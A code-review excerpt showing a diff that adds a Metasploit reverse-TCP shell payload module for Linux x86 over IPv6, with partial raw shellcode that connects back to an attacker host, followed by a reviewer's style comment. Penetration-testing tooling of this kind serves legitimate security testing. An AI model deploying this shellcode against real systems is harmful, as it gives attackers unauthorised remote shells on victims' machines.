modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb

```diff
@@ -0,0 +1,53 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = 170
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Linux Command Shell, Reverse TCP Inline (IPv6)',
+      'Description'   => 'Connect back to attacker and spawn a command shell over IPv6',
+      'Author'        => 'Matteo Malvica <matteo[at]malvica.com>',  # avanzo
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'linux',
+      'Arch'          => ARCH_X86,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix
+    ))
+  end
+
+  def generate
+      target_ipv6 = IPAddr.new(datastore['LHOST']).hton.scan(/..../) # convert LHOST to expanded IPv6 address in hex format
+      first_dword  = target_ipv6[0]
+      second_dword = target_ipv6[1]
+      third_dword  = target_ipv6[2]
+      fourth_dword = target_ipv6[3]
+      "\x31\xdb\xf7\xe3\x6a\x06\x6a\x01\x6a\x0a\x89\xe1\xb0\x66\xb3\x01" +
+      "\xcd\x80\x89\xc6\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xd8\x74\x02" +
+      "\x77\x70\x31\xc9\x31\xdb\x53\x53" +
+      "\x68" + fourth_dword + # push the four dward on the stack in reverse order
```

Comment:
personally I'd omit the `fourth_dword` etc variables and just do `"\x68" + target_ipv6[3] + # push the four dwords on the stack in reverse order`